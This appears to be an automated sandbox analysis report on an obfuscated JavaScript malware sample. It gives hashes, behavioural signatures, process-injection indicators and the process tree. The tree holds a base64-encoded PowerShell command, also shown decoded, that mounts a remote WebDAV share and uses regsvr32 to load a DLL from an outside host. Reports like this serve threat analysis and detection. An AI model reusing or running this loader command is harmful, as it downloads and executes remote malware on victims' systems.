Analysis
max time kernel: 117s
max time network: 118s
platform: windows7_x64
resource: win7-20240708-en
resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
submitted: 21/08/2024, 15:39
Static task: static1
Behavioral task: behavioral1
  Sample: 70ec5624f3d3b10e06cc21ff625d8871f81e4d5de1ee2c921a963df7a4015c58.js
  Resource: win7-20240708-en
Behavioral task: behavioral2
  Sample: 70ec5624f3d3b10e06cc21ff625d8871f81e4d5de1ee2c921a963df7a4015c58.js
  Resource: win10v2004-20240802-en
General
Target: 70ec5624f3d3b10e06cc21ff625d8871f81e4d5de1ee2c921a963df7a4015c58.js
Size: 14KB
MD5: f565069bbe97855d32a7e9858d4b8ef6
SHA1: d3344bd0537addf599ea6682c5871c65887888b0
SHA256: 70ec5624f3d3b10e06cc21ff625d8871f81e4d5de1ee2c921a963df7a4015c58
SHA512: ae791a1cf92182dcc7c105204fca1f2e275daa8e1724d440d79f25e5111d56d7afa07290b88059238003f46b0b8e2ee0ecd989f07c44689ef2a4f7e64463d2d1
SSDEEP: 96:Ulm1iYg+hW6LOQFLrIjHOZqlfKXq+OdhDidHclR7DewP3/vIkP0OqRozopEGv558:SO7hlsebzE5Pn4H63wC
Malware Config
Signatures
- Obfuscated Files or Information: Command Obfuscation (1 TTPs)
  Adversaries may obfuscate content during command execution to impede detection.
- Command and Scripting Interpreter: JavaScript (1 TTPs)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid   Process
  2756  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  2756  powershell.exe
- Suspicious use of WriteProcessMemory (11 IoCs)
  description                      pid   Process         procid_target
  PID 348 wrote to memory of 2756   348   wscript.exe     30
  PID 348 wrote to memory of 2756   348   wscript.exe     30
  PID 348 wrote to memory of 2756   348   wscript.exe     30
  PID 2756 wrote to memory of 2616  2756  powershell.exe  32
  PID 2756 wrote to memory of 2616  2756  powershell.exe  32
  PID 2756 wrote to memory of 2616  2756  powershell.exe  32
  PID 2756 wrote to memory of 2768  2756  powershell.exe  33
  PID 2756 wrote to memory of 2768  2756  powershell.exe  33
  PID 2756 wrote to memory of 2768  2756  powershell.exe  33
  PID 2756 wrote to memory of 2768  2756  powershell.exe  33
  PID 2756 wrote to memory of 2768  2756  powershell.exe  33
Processes
1. C:\Windows\system32\wscript.exe
   Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\70ec5624f3d3b10e06cc21ff625d8871f81e4d5de1ee2c921a963df7a4015c58.js
   PID: 348
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABjAGwAbwB1AGQAcwBsAGkAbQBpAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgBlAGcAcwB2AHIAMwAyACAALwBzACAAXABcAGMAbABvAHUAZABzAGwAaQBtAGkAdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADEAOQA5ADQAMgAwADIAMAA1ADUAOQAzADUALgBkAGwAbAA=
      Decoded -EncodedCommand (base64 of UTF-16LE; decoded here for readability, not part of the sandbox output; it matches the two child processes below): net use \\cloudslimit.com@8888\davwwwroot\ ; regsvr32 /s \\cloudslimit.com@8888\davwwwroot\11994202055935.dll
      PID: 2756
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\system32\net.exe
         Command line: "C:\Windows\system32\net.exe" use \\cloudslimit.com@8888\davwwwroot\
         PID: 2616
      3. C:\Windows\system32\regsvr32.exe
         Command line: "C:\Windows\system32\regsvr32.exe" /s \\cloudslimit.com@8888\davwwwroot\11994202055935.dll
         PID: 2768